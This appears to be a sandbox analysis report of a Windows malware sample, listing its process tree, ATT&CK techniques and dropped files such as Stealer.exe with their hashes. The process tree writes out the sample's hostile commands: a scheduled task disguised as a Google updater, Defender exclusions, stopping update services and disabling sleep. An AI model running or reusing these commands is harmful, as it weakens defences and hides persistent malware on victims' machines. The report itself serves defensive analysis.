  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cxqteetr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2992
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2804
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2796
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2752
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2824
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2984
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2452
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2764
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1164
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cxqteetr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1656
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:932
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2452
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2828
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2568
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2800
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:1344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:884
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1960
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:3028
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1508
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:1308
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2072
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:1032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2420
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2440
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:864
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1036
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2416

C:\Windows\system32\taskeng.exe
taskeng.exe {F34A148F-307B-490E-8C98-B194E584D890} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1376
- C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:1708

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
311KB

MD5
d2be8b5ab71e40b09b0d87c299350451

SHA1
187249ff0e080ff91ab16022d82e7c044b9638b2

SHA256
97559acaa4dfaa8d88225ade15e76c90d5e857f130aaabc44d60c6ede2afe959

SHA512
ed6465a9bf54432deafa80440be18b4a0e5b091c5c79719cc952fb9501b66e746b1024c6f4795b9e72181e29cac882c0c9eaf6b54875d533eae2274edb7d1c4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\kaban.exe

Filesize
549KB

MD5
f6feba04f41fba12a5e9f3e610f05ba0

SHA1
fff10a0adf752e7bec16d69ab3d1911a1ea7ffae

SHA256
e116555c068fdfdda264b5ade3846ba4239ff86d82084c88909b3e8509e14ebe

SHA512
11a6f55699cb374ec6c6e8f4442066d7317d9583eeff4555d27472b713015e3e0d26bc6df3f2dd192c10db22377ec3421912c70b20bd8bc509e7df4f31ca9924

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dd3df4290d4dce8d33b4a5f8cf368ade

SHA1
edd660233a15a20c09976267b1266e8390561244

SHA256
d78c35d8d98d7a5ca5c61348e4dee23c418e26409bd1556a131dcc91face204e

SHA512
395ae280e0aadc6d262d03827874c883b0a15c02f3357e6896c8ebc0070aab782233af614d12b1290b97659fdc5c9325ba83f55f0bb00f8c826ddfa9f3d6b44a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe

Filesize
230KB

MD5
75d1a51d608f2812db4dfb3e00616b4d

SHA1
5ee4157f474de2525afc8f772cb30407bee89998

SHA256
75503a09abbbddd4921e140bc4c9e50bcda02c67f6a078d62aa387c6421c8295

SHA512
a7dd8e26152b7310e745a98f059ecf4115092e4f290f8574fe54df7ded47b7aced7feab72d5a67faadc50a89f7789b477d27447031186cc34701391de9ed9bda

Download Submit
memory/932-213-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/932-171-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1048-50-0x0000000000EE0000-0x0000000000F34000-memory.dmp

Filesize
336KB

Download
memory/1708-111-0x000000013F5B0000-0x0000000143274000-memory.dmp

Filesize
60.8MB

Download
memory/1952-57-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

Filesize
32KB

Download
memory/1964-297-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-214-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-670-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-630-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-589-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-547-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-506-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-112-0x00000000000F0000-0x0000000000110000-memory.dmp

Filesize
128KB

Download
memory/1964-465-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-424-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-172-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-381-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-338-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1964-255-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2036-38-0x0000000001350000-0x0000000001390000-memory.dmp

Filesize
256KB

Download
memory/2060-19-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2060-20-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2108-1-0x0000000000D10000-0x000000000351E000-memory.dmp

Filesize
40.1MB

Download
memory/2108-0-0x000007FEF5903000-0x000007FEF5904000-memory.dmp

Filesize
4KB

Download
memory/2260-65-0x000000013FF30000-0x0000000143BF4000-memory.dmp

Filesize
60.8MB

Download
memory/2424-44-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/2532-6-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2532-7-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2532-8-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/2968-186-0x00000000004E0000-0x00000000004EC000-memory.dmp

Filesize
48KB

Download
memory/2968-26-0x00000000010C0000-0x0000000001150000-memory.dmp

Filesize
576KB

Download